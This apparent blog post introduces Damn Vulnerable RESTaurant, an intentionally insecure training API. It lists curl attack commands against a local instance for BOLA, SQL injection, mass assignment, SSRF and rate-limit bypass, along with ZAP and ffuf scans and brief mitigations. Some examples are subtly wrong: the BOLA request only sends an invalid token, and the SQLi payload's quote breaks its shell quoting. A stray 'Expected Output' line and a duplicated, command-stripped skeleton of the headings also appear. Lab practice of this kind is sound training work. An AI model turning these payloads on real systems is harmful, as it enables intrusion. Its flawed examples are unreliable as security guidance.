Damn Vulnerable RESTaurant: A Hands-On Guide To API Security Testing

The Damn Vulnerable RESTaurant is an intentionally insecure API service designed for developers, ethical hackers, and security engineers to practice identifying and exploiting common API vulnerabilities, including those listed in the OWASP Top 10 API Security Risks 2023.

🔗 GitHub Repository: https://github.com/KrzysztofPranczk/Damn-Vulnerable-RESTaurant
🔗 Blog : https://medium.com/@krzysztofpranczk/introducing-damn-vulnerable-restaurant

You Should Know: Essential Commands & Techniques for Testing API Security

1. Setting Up the Lab

Clone the repository and run the vulnerable API locally:

git clone https://github.com/KrzysztofPranczk/Damn-Vulnerable-RESTaurant.git
cd Damn-Vulnerable-RESTaurant
docker-compose up --build

2. Common API Attacks & Mitigations

Broken Object Level Authorization (BOLA)

Exploit:

curl -X GET http://localhost:8000/api/users/1 -H "Authorization: Bearer INVALID_TOKEN"

Mitigation: Implement proper access control checks.

Injection Attacks (SQLi, Command Injection)

Exploit (SQLi):

curl -X POST http://localhost:8000/api/login --data '{"username":"admin'--","password":"anything"}'

Mitigation: Use parameterized queries.

Mass Assignment

Exploit:

curl -X POST http://localhost:8000/api/users -H "Content-Type: application/json" -d '{"username":"attacker","isAdmin":true}'

Mitigation: Whitelist allowed fields.

Server-Side Request Forgery (SSRF)

Exploit:

curl -X GET http://localhost:8000/api/fetch?url=http://internal-server.local

Mitigation: Validate and sanitize URLs.

3. Automated API Scanning with OWASP ZAP

docker run -v $(pwd):/zap/wrk -t owasp/zap2docker-stable zap-api-scan.py -t http://localhost:8000/openapi.json -f openapi -r report.html

4. Fuzzing with FFUF

ffuf -u http://localhost:8000/api/FUZZ -w /usr/share/wordlists/dirb/common.txt

5. Rate Limiting Bypass

Exploit:

for i in {1..100}; do curl -X POST http://localhost:8000/api/reset_password --data '{"email":"[email protected]"}'; done

Mitigation: Implement rate limiting and CAPTCHA.

What Undercode Say

API security is critical in modern applications, and hands-on practice is essential. The Damn Vulnerable RESTaurant provides a safe environment to test exploits like BOLA, Injection, SSRF, and Mass Assignment. Always:
– Validate inputs
– Enforce strict authentication
– Monitor API traffic
– Use automated scanners like OWASP ZAP

For further learning, explore:

Expected Output:

A structured guide on exploiting and securing APIs using Damn Vulnerable RESTaurant, complete with practical commands and mitigations.

References:

Reported By: Krzysztof Pranczk – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Listen to this Post

1. Setting Up the Lab

2. Common API Attacks & Mitigations

Broken Object Level Authorization (BOLA)

Exploit:

Mitigation: Implement proper access control checks.

Injection Attacks (SQLi, Command Injection)

Exploit (SQLi):

Mitigation: Use parameterized queries.

Mass Assignment

Exploit:

Mitigation: Whitelist allowed fields.

Server-Side Request Forgery (SSRF)

Exploit:

Mitigation: Validate and sanitize URLs.

3. Automated API Scanning with OWASP ZAP

4. Fuzzing with FFUF

5. Rate Limiting Bypass

Exploit:

Mitigation: Implement rate limiting and CAPTCHA.

What Undercode Say

For further learning, explore:

Expected Output:

References:

Join Our Cyber World:

Related Posts: